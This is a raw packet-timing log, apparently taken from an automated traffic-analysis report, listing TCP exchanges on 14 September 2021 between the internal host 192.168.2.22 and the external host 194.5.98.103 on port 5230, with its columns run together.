                                  Sep 14, 2021 21:49:04.726877928 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.727075100 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.727092028 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.727170944 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.727200031 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.727235079 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.727247000 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.727288961 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.727377892 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.727401018 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.727423906 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.727452993 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.727463961 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.727478027 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.727483034 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.727483988 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.727534056 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.727576017 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.727623940 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.727657080 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.727683067 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.727731943 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.727771997 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.727829933 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.727859974 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.727910995 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.727924109 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.727982044 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.728050947 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.728110075 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.728142977 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.728177071 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.728245974 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:04.728274107 CEST523049174194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:04.728364944 CEST491745230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:08.743561983 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:08.899065971 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:08.899188995 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:08.900281906 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:09.083476067 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:09.083575964 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:09.293173075 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:09.293246984 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:09.449060917 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:09.449170113 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:09.644869089 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:09.645005941 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:09.850022078 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:09.850147963 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:09.864123106 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:09.864147902 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:09.864164114 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:09.864212036 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:09.864257097 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:09.864295959 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.019071102 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.019159079 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.019196033 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.019241095 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.019248009 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.019270897 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.019274950 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.019310951 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.019334078 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.019346952 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.019475937 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.019619942 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.174470901 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.174511909 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.174545050 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.174604893 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.174631119 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.174654007 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.174813032 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.174851894 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.174874067 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.174894094 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.174930096 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.175056934 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.175178051 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.175199032 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.175223112 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.175275087 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.175348997 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.175383091 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.175429106 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.175672054 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.175697088 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.175705910 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.175827026 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.175859928 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.331659079 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.331712961 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.333659887 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333687067 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333703995 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333715916 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333739996 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333755970 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333756924 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.333776951 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.333782911 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333802938 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333818913 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333818913 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.333833933 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333849907 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333853960 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.333865881 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333879948 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333884001 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.333895922 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333910942 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333920002 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.333930016 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333945990 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333949089 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.333961010 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333975077 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.333976984 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.333992004 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.334002972 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.334007025 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.334023952 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.334038973 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.334041119 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.334057093 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.334074020 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.334076881 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.334108114 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.334358931 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.334374905 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.334431887 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.334487915 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.334508896 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.334542036 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.334619999 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.334625006 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.334635973 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.334670067 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.486368895 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.486418962 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.486505032 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.489892960 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.489958048 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.489964008 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.490205050 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.490247011 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.490412951 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.490449905 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.490492105 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.490510941 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.490600109 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.490641117 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.490658045 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.490693092 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.490731955 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.490854025 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.490896940 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.490938902 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.490986109 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.491023064 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.491063118 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.491260052 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.491317034 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.491364956 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.491374969 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.491401911 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.491446018 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.491451025 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.491568089 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.491643906 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.491689920 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.491746902 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.491789103 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.491796970 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.491846085 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.491883993 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.491942883 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.492074966 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.492120028 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.492120981 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.492305994 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.492351055 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.492362976 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.492399931 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.492440939 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.492563963 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.492615938 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.492665052 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.492676020 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.492733002 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.492777109 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.492784977 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.492837906 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.492881060 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.492886066 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.492935896 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.492980003 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.493324995 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.493392944 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.493449926 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.493455887 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.493556023 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.493612051 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.493613005 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.493664026 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.493701935 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.493717909 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.493768930 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.493808031 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.493815899 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.493841887 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.493875980 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.493885040 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.493917942 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.493963003 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.530761003 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.641175032 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.644526005 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.644627094 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.644629002 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.645200014 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.645260096 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.645375967 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.645580053 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.645674944 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.645754099 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.645998001 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.646047115 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.646251917 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.646291018 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.646337986 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.647111893 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.647209883 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.647259951 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.648010015 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.648191929 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.648252010 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.648257017 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.648313999 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.648360968 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.648571968 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.648719072 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.648760080 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.648771048 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.649478912 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.649535894 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.649652004 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.649743080 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.649780989 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.649791002 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.649950981 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.650003910 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.650007010 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.650041103 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.650080919 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.650433064 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.650547028 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.650593042 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.650594950 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.650755882 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.650796890 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.650804043 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.651021004 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.651062012 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.651072979 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.651098967 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.651145935 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.651417017 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.651525974 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.651575089 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.651629925 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.651802063 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.651843071 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.651844978 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.651951075 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.651998043 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.652010918 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.652151108 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.652201891 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.652394056 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.652554035 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.652595997 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.652656078 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.652784109 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.652827024 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.652930975 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.652970076 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.653007030 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.680520058 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.685575008 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.685642004 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.685719013 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.685781002 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.799266100 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.799345970 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.799346924 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.799406052 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.799453020 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.799587011 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.800091982 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.800425053 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.800466061 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.800468922 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.800554037 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.800698042 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.800770044 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.800883055 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.800954103 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.800992012 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.801105022 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.801147938 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.801367998 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.801434994 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.801508904 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.801595926 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.801639080 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.801747084 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.801837921 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.802015066 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.802052975 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.802052975 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.802181959 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.802371979 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.802412033 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.802723885 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.802802086 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.803006887 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.803052902 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.803203106 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.803245068 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.803329945 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.803378105 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.803504944 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.803678036 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.803843021 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.804013968 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.804368019 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.804423094 CEST491755230192.168.2.22194.5.98.103
